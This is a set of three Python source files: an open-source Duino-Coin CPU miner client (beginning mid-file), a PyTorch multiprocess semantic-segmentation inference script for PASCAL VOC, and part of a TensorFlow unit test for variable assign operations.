+ get_string("goodbye"),
"warning")
_exit(0)
def install(package):
"""
Automatically installs python pip package and restarts the program
"""
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
execl(sys.executable, sys.executable, *sys.argv)
try:
from xxhash import xxh64
xxhash_en = True
except ModuleNotFoundError:
print("Xxhash is not installed - this mining algorithm will be disabled")
xxhash_en = False
try:
from colorama import Back, Fore, Style, init
init(autoreset=True)
except ModuleNotFoundError:
print("Colorama is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install colorama")
install("colorama")
try:
import cpuinfo
cpu = cpuinfo.get_cpu_info()
except ModuleNotFoundError:
print("Cpuinfo is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install py-cpuinfo")
install("py-cpuinfo")
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pypresence")
install("pypresence")
try:
import psutil
except ModuleNotFoundError:
print("Psutil is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install psutil")
install("psutil")
class Settings:
"""
Class containing default miner and server settings
"""
ENCODING = "UTF8"
SEPARATOR = ","
VER = 2.7
DATA_DIR = "Duino-Coin PC Miner " + str(VER)
TRANSLATIONS = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
TRANSLATIONS_FILE = "/Translations.json"
SETTINGS_FILE = "/Settings.cfg"
SOC_TIMEOUT = 15
REPORT_TIME = 50
DONATE_LVL = 0
BLOCK = " ‖ "
PICK = " "
COG = " @"
if os.name != "nt":
# Windows' cmd does not support emojis, shame!
PICK = " ⛏"
COG = " ⚙"
class Algorithms:
"""
Class containing algorithms used by the miner
For more info about the implementation refer to the Duino whitepaper:
https://github.com/revoxhere/duino-coin/blob/gh-pages/assets/whitepaper.pdf
"""
def DUCOS1(last_h: str, exp_h: str, diff: int, eff: int):
time_start = time()
base_hash = sha1(last_h.encode('ascii'))
for nonce in range(100 * diff + 1):
if (int(eff) != 100
and nonce % (1_000 * int(eff)) == 0):
if psutil.cpu_percent() > int(eff):
sleep(1/100*int(eff))
temp_h = base_hash.copy()
temp_h.update(str(nonce).encode('ascii'))
d_res = temp_h.hexdigest()
if d_res == exp_h:
time_elapsed = time() - time_start
hashrate = nonce / time_elapsed
return [nonce, hashrate]
return [0, 0]
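# A minimal reference for the DUCO-S1 search above (sketch, without the
# efficiency throttling): the share is solved by the nonce n for which
# sha1(last_h + str(n)) equals the expected hash:
#
# def ducos1_reference(last_h, exp_h, diff):
#     for n in range(100 * diff + 1):
#         if sha1((last_h + str(n)).encode('ascii')).hexdigest() == exp_h:
#             return n
#
# The loop above is equivalent but faster, hashing the job prefix once and
# reusing a copy of that sha1 state (base_hash.copy()) for every nonce.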
def XXHASH(last_h: str, exp_h: str, diff: int, eff: int):
time_start = time()
for nonce in range(100 * diff + 1):
if (int(eff) != 100
and nonce % (1_000 * int(eff)) == 0):
if psutil.cpu_percent() > int(eff):
sleep(1/100*int(eff))
d_res = xxh64(last_h + str(nonce),
seed=2811).hexdigest()
if d_res == exp_h:
time_elapsed = time() - time_start
hashrate = nonce / time_elapsed
return [nonce, hashrate]
return [0, 0]
class Client:
"""
Class helping to organize socket connections
"""
def connect(pool: tuple):
global s
s = socket()
s.connect((pool))
def send(msg: str):
sent = s.sendall(str(msg).encode(Settings.ENCODING))
return True
def recv(limit: int = 128):
data = s.recv(limit).decode(Settings.ENCODING).rstrip("\n")
return data
def fetch_pool():
"""
Fetches best pool from the /getPool API endpoint
"""
while True:
try:
pretty_print(get_string("connection_search"),
"warning", "net0")
response = requests.get(
"https://server.duinocoin.com/getPool").json()
pretty_print(get_string('connecting_node')
+ Fore.RESET + Style.NORMAL
+ str(response["name"]),
"success", "net0")
return (response["ip"], response["port"])
except KeyboardInterrupt:
_exit(0)
except Exception as e:
pretty_print("Error retrieving mining node: "
+ str(e) + ", retrying in 15s",
"error", "net0")
sleep(15)
def get_prefix(symbol: str,
val: float,
accuracy: int):
"""
H/s, 1000 => 1 kH/s
"""
if val >= 1_000_000_000_000: # Really?
val = str(round((val / 1_000_000_000_000), accuracy)) + " T"
elif val >= 1_000_000_000:
val = str(round((val / 1_000_000_000), accuracy)) + " G"
elif val >= 1_000_000:
val = str(round((val / 1_000_000), accuracy)) + " M"
elif val >= 1_000:
val = str(round((val / 1_000), accuracy)) + " k"
else:
val = str(round(val)) + " "
return val + symbol
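# Usage example: get_prefix("H/s", 1_234, 2) returns "1.23 kH/s" and
# get_prefix("H/s", 987, 2) returns "987 H/s" (sub-kilo values are rounded
# to whole numbers regardless of the accuracy argument).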
def periodic_report(start_time, end_time,
shares, hashrate, uptime):
"""
Displays nicely formatted uptime stats
"""
seconds = round(end_time - start_time)
pretty_print(get_string("periodic_mining_report")
+ Fore.RESET + Style.NORMAL
+ get_string("report_period")
+ str(seconds) + get_string("report_time")
+ get_string("report_body1")
+ str(shares) + get_string("report_body2")
+ str(round(shares/seconds, 1))
+ get_string("report_body3")
+ get_string("report_body4")
+ str(get_prefix("H/s", hashrate, 2))
+ get_string("report_body5")
+ str(int(hashrate*seconds))
+ get_string("report_body6")
+ get_string("total_mining_time")
+ str(uptime), "success")
def calculate_uptime(start_time):
"""
Returns seconds, minutes or hours passed since timestamp
"""
uptime = time() - start_time
if uptime >= 7200:
return str(round(uptime // 3600)) + get_string("uptime_hours")
elif uptime >= 3600:
return str(round(uptime // 3600)) + get_string("uptime_hour")
elif uptime >= 120:
return str(round(uptime // 60)) + get_string("uptime_minutes")
elif uptime >= 60:
return str(round(uptime // 60)) + get_string("uptime_minute")
else:
return str(round(uptime)) + get_string("uptime_seconds")
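# Examples (suffixes come from the language file): 45 s of mining yields
# "45" + uptime_seconds, 150 s yields "2" + uptime_minutes and 7300 s
# yields "2" + uptime_hours. The largest unit is checked first so every
# branch is reachable.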
def pretty_print(msg: str = None,
state: str = "success",
sender: str = "sys0"):
"""
Produces nicely formatted CLI output for messages:
HH:MM:SS |sender| msg
"""
if sender.startswith("net"):
bg_color = Back.BLUE
elif sender.startswith("cpu"):
bg_color = Back.YELLOW
elif sender.startswith("sys"):
bg_color = Back.GREEN
if state == "success":
fg_color = Fore.GREEN
elif state == "error":
fg_color = Fore.RED
else:
fg_color = Fore.YELLOW
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT + bg_color + " " + sender + " "
+ Back.RESET + " " + fg_color + msg.strip())
def share_print(id, type,
accept, reject,
hashrate, total_hashrate,
computetime, diff, ping,
back_color):
"""
Produces nicely formatted CLI output for shares:
HH:MM:SS |cpuN| ⛏ Accepted 0/0 (100%) ∙ 0.0s ∙ 0 kH/s ⚙ diff 0 k ∙ ping 0ms
"""
total_hashrate = get_prefix("H/s", total_hashrate, 2)
diff = get_prefix("", int(diff), 0)
if type == "accept":
share_str = get_string("accepted")
fg_color = Fore.GREEN
elif type == "block":
share_str = get_string("block_found")
fg_color = Fore.YELLOW
else:
share_str = get_string("rejected")
fg_color = Fore.RED
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Fore.WHITE + Style.BRIGHT + back_color + Fore.RESET
+ " cpu" + str(id) + " " + Back.RESET
+ fg_color + Settings.PICK + share_str + Fore.RESET
+ str(accept) + "/" + str(accept + reject) + Fore.YELLOW
+ " (" + str(round(accept / (accept + reject) * 100)) + "%)"
+ Style.NORMAL + Fore.RESET
+ " ∙ " + str("%04.1f" % float(computetime)) + "s"
+ Style.NORMAL + " ∙ " + Fore.BLUE + Style.BRIGHT
+ str(total_hashrate) + Fore.RESET + Style.NORMAL
+ Settings.COG + " diff " + str(diff) + " ∙ " + Fore.CYAN
+ "ping " + str("%02.0f" % int(ping)) + "ms")
def get_string(string_name):
"""
Gets a string from the language file
"""
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
class Miner:
def greeting():
diff_str = get_string("net_diff_short")
if user_settings["start_diff"] == "LOW":
diff_str = get_string("low_diff_short")
elif user_settings["start_diff"] == "MEDIUM":
diff_str = get_string("medium_diff_short")
current_hour = strptime(ctime(time())).tm_hour
greeting = get_string("greeting_back")
if current_hour < 12:
greeting = get_string("greeting_morning")
elif current_hour == 12:
greeting = get_string("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = get_string("greeting_afternoon")
elif current_hour >= 18:
greeting = get_string("greeting_evening")
print("\n" + Style.DIM + Fore.YELLOW + Settings.BLOCK + Fore.YELLOW
+ Style.BRIGHT + get_string("banner") + Style.RESET_ALL
+ Fore.MAGENTA + " (v" + str(Settings.VER) + ") "
+ Fore.RESET + "2019-2021")
print(Style.DIM + Fore.YELLOW + Settings.BLOCK + Style.NORMAL
+ Fore.YELLOW + "https://github.com/revoxhere/duino-coin")
if lang != "english":
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + lang.capitalize()
+ " translation: " + Fore.YELLOW
+ get_string("translation_autor"))
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + "CPU: " + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["threads"])
+ "x " + str(cpu["brand_raw"]))
if os.name == "nt" or os.name == "posix":
print(Style.DIM + Fore.YELLOW
+ Settings.BLOCK + Style.NORMAL + Fore.RESET
+ get_string("donation_level") + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["donate"]))
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + get_string("algorithm")
+ Style.BRIGHT + Fore.YELLOW + user_settings["algorithm"]
+ Settings.COG + " " + diff_str)
if user_settings["identifier"] != "None":
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + get_string("rig_identifier")
+ Style.BRIGHT + Fore.YELLOW + user_settings["identifier"])
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + str(greeting)
+ ", " + Style.BRIGHT + Fore.YELLOW
+ str(user_settings["username"]) + "!\n")
def preload():
"""
Creates needed directories and files for the miner
"""
global lang_file
global lang
if not Path(Settings.DATA_DIR).is_dir():
mkdir(Settings.DATA_DIR)
if not Path(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE).is_file():
with open(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE,
"wb") as f:
f.write(requests.get(Settings.TRANSLATIONS).content)
with open(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE, "r",
encoding=Settings.ENCODING) as file:
lang_file = json.load(file)
try:
if not Path(Settings.DATA_DIR + Settings.SETTINGS_FILE).is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("mt"):
lang = "maltese"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("pr"):
lang = "portugese"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("zh"):
lang = "chinese_simplified"
elif locale.startswith("th"):
lang = "thai"
else:
lang = "english"
else:
try:
configparser.read(Settings.DATA_DIR
+ Settings.SETTINGS_FILE)
lang = configparser["PC Miner"]["language"]
except Exception:
lang = "english"
except Exception as e:
print("Error with lang file, falling back to english: " + str(e))
lang = "english"
def load_cfg():
"""
Loads miner settings file or starts the config tool
"""
if not Path(Settings.DATA_DIR + Settings.SETTINGS_FILE).is_file():
print(get_string("basic_config_tool")
+ Settings.DATA_DIR
+ get_string("edit_config_file_warning")
+ "\n"
+ get_string("dont_have_account")
+ Fore.YELLOW
+ get_string("wallet")
+ Fore.RESET
+ get_string("register_warning"))
username = input(get_string("ask_username") + Style.BRIGHT)
if not username:
username = choice(["revox", "Bilaboz", "JoyBed", "Connor2"])
algorithm = "DUCO-S1"
if xxhash_en:
print(Style.BRIGHT
+ "1" + Style.NORMAL + " - DUCO-S1 ("
+ get_string("recommended")
+ ")\n" + Style.BRIGHT
+ "2" + Style.NORMAL + " - XXHASH")
algorithm = sub(r"\D", "",
input(get_string("ask_algorithm")
+ Style.BRIGHT))
if algorithm == "2":
algorithm = "XXHASH"
intensity = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_intensity")
+ Style.BRIGHT))
if not intensity:
intensity = 95
elif float(intensity) > 100:
intensity = 100
elif float(intensity) < 1:
intensity = 1
threads = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_threads")
+ str(cpu_count()) + "): " + Style.BRIGHT))
if not threads:
threads = cpu_count()
elif int(threads) > 8:
threads = 8
pretty_print(
Style.BRIGHT
+ get_string("max_threads_notice"))
elif int(threads) < 1:
threads = 1
print(Style.BRIGHT
+ "1" + Style.NORMAL + " - " + get_string("low_diff")
+ "\n" + Style.BRIGHT
+ "2" + Style.NORMAL + " - " + get_string("medium_diff")
+ "\n" + Style.BRIGHT
+ "3" + Style.NORMAL + " - " + get_string("net_diff"))
start_diff = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_difficulty")
+ Style.BRIGHT))
if start_diff == "1":
start_diff = "LOW"
elif start_diff == "3":
start_diff = "NET"
else:
start_diff = "MEDIUM"
rig_id = input(Style.NORMAL + get_string("ask_rig_identifier")
+ Style.BRIGHT)
if rig_id.lower() == "y":
rig_id = input(Style.NORMAL + get_string("ask_rig_name")
+ Style.BRIGHT)
else:
rig_id = "None"
configparser["PC Miner"] = {
"username": username,
"intensity": intensity,
"threads": threads,
"start_diff": start_diff,
"donate": Settings.DONATE_LVL,
"identifier": rig_id,
"algorithm": algorithm,
"language": lang,
"debug": "n",
"soc_timeout": Settings.SOC_TIMEOUT,
"report_sec": Settings.REPORT_TIME,
"discord_rp": "y"}
with open(Settings.DATA_DIR + Settings.SETTINGS_FILE,
"w") as configfile:
configparser.write(configfile)
print(Style.RESET_ALL + get_string("config_saved"))
configparser.read(Settings.DATA_DIR
+ Settings.SETTINGS_FILE)
return configparser["PC Miner"]
def m_connect(id, pool):
socket_connection = Client.connect(pool)
POOL_VER = Client.recv(5)
if id == 0:
Client.send("MOTD")
motd = Client.recv(512).replace("\n", "\n\t\t")
pretty_print("MOTD: " + Fore.RESET + Style.NORMAL + str(motd),
"success", "net" + str(id))
if float(POOL_VER) <= Settings.VER:
pretty_print(get_string("connected") + Fore.RESET
+ Style.NORMAL + get_string("connected_server")
+ str(POOL_VER) + ", " + pool[0] + ":"
+ str(pool[1]) + ")", "success", "net" + str(id))
else:
pretty_print(get_string("outdated_miner")
+ str(Settings.VER) + ") -"
+ get_string("server_is_on_version")
+ str(POOL_VER) + Style.NORMAL
+ Fore.RESET + get_string("update_warning"),
"warning", "net" + str(id))
sleep(5)
def mine(id: int, user_settings: list,
pool: tuple,
accept: int, reject: int,
hashrate: list):
"""
Main mining loop that ties together the helpers defined above.
"""
using_algo = get_string("using_algo")
if user_settings["algorithm"] == "XXHASH":
using_algo = get_string("using_algo_xxh")
pretty_print(get_string("mining_thread") + str(id)
+ get_string("mining_thread_starting")
+ Style.NORMAL + Fore.RESET + using_algo + Fore.YELLOW
+ str(user_settings["intensity"])
+ "% " + get_string("efficiency"),
"success", "sys"+str(id))
last_report = time()
r_shares, last_shares = 0, 0
while True:
try:
Miner.m_connect(id, pool)
while True:
try:
while True:
job_req = "JOB"
if user_settings["algorithm"] == "XXHASH":
job_req = "JOBXX"
Client.send(job_req
+ Settings.SEPARATOR
+ str(user_settings["username"])
+ Settings.SEPARATOR
+ str(user_settings["start_diff"]))
job = Client.recv().split(Settings.SEPARATOR)
if len(job) == 3:
break
else:
pretty_print(
"Node message: " + str(job[1]),
"warning")
sleep(3)
while True:
time_start = time()
if user_settings["algorithm"] == "XXHASH":
back_color = Back.CYAN
result = Algorithms.XXHASH(
job[0], job[1], int(job[2]),
user_settings["intensity"])
else:
back_color = Back.YELLOW
result = Algorithms.DUCOS1(
job[0], job[1], int(job[2]),
user_settings["intensity"])
computetime = time() - time_start
hashrate[id] = result[1]
total_hashrate = sum(hashrate.values())
while True:
Client.send(str(result[0])
+ Settings.SEPARATOR
+ str(result[1])
+ Settings.SEPARATOR
+ "Official PC Miner ("
+ user_settings["algorithm"]
+ ") v" + str(Settings.VER)
+ Settings.SEPARATOR
+ str(user_settings["identifier"]))
time_start = time()
feedback = Client.recv(
).split(Settings.SEPARATOR)
ping = (time() - time_start) * 1000
if feedback[0] == "GOOD":
accept.value += 1
share_print(id, "accept",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
elif feedback[0] == "BLOCK":
accept.value += 1
share_print(id, "block",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
elif feedback[0] == "BAD":
reject.value += 1
share_print(id, "reject",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
if id == 0:
end_time = time()
elapsed_time = end_time - last_report
if elapsed_time >= Settings.REPORT_TIME:
r_shares = accept.value - last_shares
uptime = calculate_uptime(
mining_start_time)
periodic_report(last_report, end_time,
r_shares,
sum(hashrate.values()),
uptime)
last_report = time()
last_shares = accept.value
break
break
except Exception as e:
pretty_print(get_string("error_while_mining") + str(e),
"error", "net" + str(id))
sleep(5)
break
except Exception as e:
pass
class Discord_rp:
def connect():
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
Thread(target=Discord_rp.update).start()
except Exception as e:
#print("Error launching Discord RPC thread: " + str(e))
pass
def update():
while True:
try:
total_hashrate = get_prefix("H/s", sum(hashrate.values()), 2)
RPC.update(details="Hashrate: " + str(total_hashrate),
start=mining_start_time,
state=str(accept.value) + "/"
+ str(reject.value + accept.value)
+ " accepted shares",
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything"
+ ", including AVR boards",
buttons=[{"label": "Visit duinocoin.com",
"url": "https://duinocoin.com"},
{"label": "Join the Discord",
"url": "https://discord.gg/k48Ht5y"}])
except Exception as e:
#print("Error updating Discord RPC thread: " + str(e))
pass
sleep(15)
if __name__ == "__main__":
mining_start_time = time()
p_list = []
accept = Manager().Value("i", 0)
reject = Manager().Value("i", 0)
hashrate = Manager().dict()
signal(SIGINT, handler)
Miner.preload()
user_settings = Miner.load_cfg()
Miner.greeting()
fastest_pool = Client.fetch_pool()
for i in range(int(user_settings["threads"])):
p = Process(target=Miner.mine,
args=[i, user_settings,
fastest_pool, accept, reject,
hashrate])
p_list.append(p)
p.start()
sleep(0.05)
Discord_rp.connect()
for p in p_list:
p.join()
|
test_multiprocess.py
|
import os
import cv2
import pylab
import warnings
import argparse
import numpy as np
import scipy.ndimage as nd
from multiprocessing import Process
import torch.nn.functional as F
import torch
import network as models
from utils.util import load_model
import krahenbuhl2013
import skimage.color as imgco
import skimage.io as imgio
warnings.filterwarnings('ignore', '.*output shape of zoom.*')
IMAGE_MEAN_VALUE = [104.0, 117.0, 123.0]
label2rgb_colors = np.array([(0, 0, 0), (128, 0, 0), (0, 128, 0), (128, 128, 0),
(0, 0, 128), (128, 0, 128), (0, 128, 128), (128, 128, 128),
(64, 0, 0), (192, 0, 0), (64, 128, 0), (192, 128, 0),
(64, 0, 128), (192, 0, 128), (64, 128, 128), (192, 128, 128),
(0, 64, 0), (128, 64, 0), (0, 192, 0), (128, 192, 0),
(0, 64, 128)]) # using palette for pascal voc
def label2rgb(label,cls_label,colors=[],ignore_label=128,ignore_color=(255,255,255)):
if len(colors) <= 0:
index = np.unique(label)
index = index[index<21]
colors = label2rgb_colors[index]
label = imgco.label2rgb(label,colors=colors,bg_label=ignore_label,bg_color=ignore_color)
return label.astype(np.uint8)
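# Example (illustrative): for a label mask containing classes {0, 1, 15},
# the colors are rows 0, 1 and 15 of label2rgb_colors (the PASCAL VOC
# palette), while pixels equal to ignore_label (128) are painted with
# ignore_color (white) by skimage's label2rgb.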
def parser_args():
parser = argparse.ArgumentParser(description='Get segmentation prediction')
parser.add_argument("--image-list", default='./datalist/PascalVOC/val_id.txt', type=str, help="Path to image list")
parser.add_argument("--image-path", default='./dataset/PascalVOC/VOCdevkit/VOC2012',type=str, help="Path to image")
parser.add_argument('--cls-labels-path', default='./datalist/PascalVOC/cls_labels.npy', type=str)
parser.add_argument("--arch", default='deeplab_large_fov', type=str, help="Model type")
parser.add_argument("--trained", default='./train_log/1', type=str, help="Model weights")
parser.add_argument("--pred-path", default='./result/1', type=str, help="Output png file name")
parser.add_argument("--smooth", action='store_true', help="Apply postprocessing")
parser.add_argument('--gpu', dest='gpu_id', default=0, type=int, help='GPU device id to use [0]')
parser.add_argument('--split-size', default=8, type=int)
parser.add_argument('--num-gpu', default=1, type=int)
parser.add_argument('--color-mask', type=int, default=1)
args = parser.parse_args()
return args
def preprocess(image, size, mean_pixel):
image = np.array(image)
image = nd.zoom(image.astype('float32'),
(size / float(image.shape[0]), size / float(image.shape[1]), 1.0),
order=1)
# RGB to BGR
image = image[:, :, [2, 1, 0]]
image = image - np.array(mean_pixel)
# BGR to RGB
image = image.transpose([2, 0, 1])
return np.expand_dims(image, 0)
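# Shape walk-through (illustrative): an H x W x 3 RGB input is zoomed to
# size x size x 3, channel-swapped to BGR, mean-subtracted, transposed to
# CHW and batched, so preprocess(im, 321, IMAGE_MEAN_VALUE) returns an
# array of shape (1, 3, 321, 321).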
def predict_label_mask(image_file, model, smooth, gpu_id):
im = pylab.imread(image_file)
image = torch.from_numpy(preprocess(im, 321, IMAGE_MEAN_VALUE).astype(np.float32))
image = image.cuda(gpu_id)
featmap, _ = model(image)
scores = featmap.reshape(21, 41, 41).detach().cpu().numpy().transpose(1, 2, 0)
d1, d2 = float(im.shape[0]), float(im.shape[1])
scores_exp = np.exp(scores - np.max(scores, axis=2, keepdims=True))
probs = scores_exp / np.sum(scores_exp, axis=2, keepdims=True)
probs = nd.zoom(probs, (d1 / probs.shape[0], d2 / probs.shape[1], 1.0), order=1)
eps = 0.00001
probs[probs < eps] = eps
if smooth:
result = np.argmax(krahenbuhl2013.CRF(im, np.log(probs), scale_factor=1.0), axis=2)
else:
result = np.argmax(probs, axis=2)
return result
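# The block above is a hand-rolled, numerically stable softmax over the 21
# class scores: probs[c] = exp(s[c] - max(s)) / sum(exp(s[c'] - max(s))),
# evaluated per pixel, then linearly upsampled to the input resolution and
# optionally refined with a dense CRF.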
def predict_color_mask(image_file, model, smooth, gpu_id, cls_label):
cls_label = np.insert(cls_label, 0, 1)
cls_label = np.squeeze(np.asarray(np.nonzero(cls_label), dtype=int))
im = pylab.imread(image_file)
d1, d2 = float(im.shape[0]), float(im.shape[1])
image = torch.from_numpy(preprocess(im, 321, IMAGE_MEAN_VALUE).astype(np.float32))
image = image.cuda(gpu_id)
featmap = model(image)
featmap = featmap.reshape(21, 41, 41).detach().cpu().numpy().transpose(1, 2, 0)
featmap = nd.zoom(featmap, (d1 / featmap.shape[0], d2 / featmap.shape[1], 1.0), order=2)
if smooth:
crf_pred = krahenbuhl2013.CRF(im, np.array(featmap), scale_factor=1.0)
else:
crf_pred = featmap
output = label2rgb(np.argmax(featmap,axis=2), cls_label)
pred = label2rgb(np.argmax(crf_pred,axis=2), cls_label)
return output, pred
def save_mask_multiprocess(num, data_size):
process_id = os.getpid()
print('process {} starts...'.format(process_id))
if args.num_gpu == 1:
gpu_id = args.gpu_id
elif args.num_gpu == 2:
if num >= data_size // args.num_gpu:
gpu_id = args.gpu_id + 0
else:
gpu_id = args.gpu_id + 1
elif args.num_gpu == 4:
if num >= data_size // args.num_gpu * 3:
gpu_id = args.gpu_id + 0
elif num >= data_size // args.num_gpu * 2:
gpu_id = args.gpu_id + 1
elif num >= data_size // args.num_gpu * 1:
gpu_id = args.gpu_id + 2
else:
gpu_id = args.gpu_id + 3
else:
raise Exception("ERROR")
base_model = models.__dict__[args.arch](num_classes=21)
model = base_model
model = load_model(model, args.trained)
model = model.cuda(gpu_id)
model.eval()
if num == data_size - 1:
sub_image_ids = image_ids[num * len(image_ids) // data_size:]
else:
sub_image_ids = image_ids[num * len(image_ids) // data_size: (num + 1) * len(image_ids) // data_size]
if num == 0:
print(len(sub_image_ids), 'images per each process...')
for idx, img_id in enumerate(sub_image_ids):
if num == 0 and idx % 10 == 0:
print("[{0} * {3}]/[{1} * {3}] : {2} is done.".format(idx, len(sub_image_ids), img_id, args.split_size))
image_file = os.path.join(image_path, img_id + '.jpg')
cls_label = cls_list[img_id]
if args.color_mask:
output, pred = predict_color_mask(image_file, model, args.smooth, gpu_id, cls_label)
save_path = os.path.join(args.pred_path, "output" ,img_id + '_output.png')
cv2.imwrite(save_path, cv2.cvtColor(output, cv2.COLOR_RGB2BGR))
save_path = os.path.join(args.pred_path, "pred", img_id + '_pred.png')
cv2.imwrite(save_path, cv2.cvtColor(pred, cv2.COLOR_RGB2BGR))
else:
labelmap = predict_label_mask(image_file, model, args.smooth, gpu_id)
save_path = os.path.join(args.pred_path, "label_mask" ,img_id + '_labelmask.png')
cv2.imwrite(save_path, labelmap)
if __name__ == "__main__":
args = parser_args()
image_ids = [i.strip() for i in open(args.image_list) if not i.strip() == '']
image_path = os.path.join(args.image_path, 'JPEGImages')
if args.pred_path and (not os.path.isdir(args.pred_path)):
os.makedirs(args.pred_path)
pred = args.pred_path + "/pred"
output = args.pred_path + "/output"
label_mask = args.pred_path + "/label_mask"
if not os.path.isdir(pred):
os.makedirs(pred)
if not os.path.isdir(output):
os.makedirs(output)
if not os.path.isdir(label_mask):
os.makedirs(label_mask)
cls_list = np.load(args.cls_labels_path, allow_pickle=True).tolist()
split_size = args.split_size * args.num_gpu
numbers = range(split_size)
processes = []
for index, number in enumerate(numbers):
proc = Process(target=save_mask_multiprocess, args=(number, split_size,))
processes.append(proc)
proc.start()
for proc in processes:
proc.join()
|
dense_update_ops_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.tf.Assign*."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class AssignOpTest(test.TestCase):
def _initAssignFetch(self, x, y, use_gpu=False):
"""Initialize a param to init and update it with y."""
super(AssignOpTest, self).setUp()
with self.test_session(use_gpu=use_gpu):
p = variables.Variable(x)
assign = state_ops.assign(p, y)
p.initializer.run()
new_value = assign.eval()
return p.eval(), new_value
def _initAssignAddFetch(self, x, y, use_gpu=False):
"""Initialize a param to init, and compute param += y."""
with self.test_session(use_gpu=use_gpu):
p = variables.Variable(x)
add = state_ops.assign_add(p, y)
p.initializer.run()
new_value = add.eval()
return p.eval(), new_value
def _initAssignSubFetch(self, x, y, use_gpu=False):
"""Initialize a param to init, and compute param -= y."""
with self.test_session(use_gpu=use_gpu):
p = variables.Variable(x)
sub = state_ops.assign_sub(p, y)
p.initializer.run()
new_value = sub.eval()
return p.eval(), new_value
def _testTypes(self, vals):
for dtype in [np.float32, np.float64, np.int32, np.int64]:
x = np.zeros(vals.shape).astype(dtype)
y = vals.astype(dtype)
var_value, op_value = self._initAssignFetch(x, y, use_gpu=False)
self.assertAllEqual(y, var_value)
self.assertAllEqual(y, op_value)
var_value, op_value = self._initAssignAddFetch(x, y, use_gpu=False)
self.assertAllEqual(x + y, var_value)
self.assertAllEqual(x + y, op_value)
var_value, op_value = self._initAssignSubFetch(x, y, use_gpu=False)
self.assertAllEqual(x - y, var_value)
self.assertAllEqual(x - y, op_value)
if test.is_built_with_cuda() and dtype in [np.float32, np.float64]:
var_value, op_value = self._initAssignFetch(x, y, use_gpu=True)
self.assertAllEqual(y, var_value)
self.assertAllEqual(y, op_value)
var_value, op_value = self._initAssignAddFetch(x, y, use_gpu=True)
self.assertAllEqual(x + y, var_value)
self.assertAllEqual(x + y, op_value)
var_value, op_value = self._initAssignSubFetch(x, y, use_gpu=True)
self.assertAllEqual(x - y, var_value)
self.assertAllEqual(x - y, op_value)
def testBasic(self):
self._testTypes(np.arange(0, 20).reshape([4, 5]))
def testAssignNonStrictShapeChecking(self):
with self.test_session():
data = array_ops.fill([1024, 1024], 0)
p = variables.Variable([1])
a = state_ops.assign(p, data, validate_shape=False)
a.op.run()
self.assertAllEqual(p.eval(), data.eval())
# Assign to yet another shape
data2 = array_ops.fill([10, 10], 1)
a2 = state_ops.assign(p, data2, validate_shape=False)
a2.op.run()
self.assertAllEqual(p.eval(), data2.eval())
def testInitRequiredAssignAdd(self):
with self.test_session():
p = variables.Variable(array_ops.fill([1024, 1024], 1), dtypes.int32)
a = state_ops.assign_add(p, array_ops.fill([1024, 1024], 0))
with self.assertRaisesOpError("use uninitialized"):
a.op.run()
def testInitRequiredAssignSub(self):
with self.test_session():
p = variables.Variable(array_ops.fill([1024, 1024], 1), dtypes.int32)
a = state_ops.assign_sub(p, array_ops.fill([1024, 1024], 0))
with self.assertRaisesOpError("use uninitialized"):
a.op.run()
# NOTE(mrry): See also
# dense_update_ops_no_tsan_test.AssignOpTest, which contains a benign
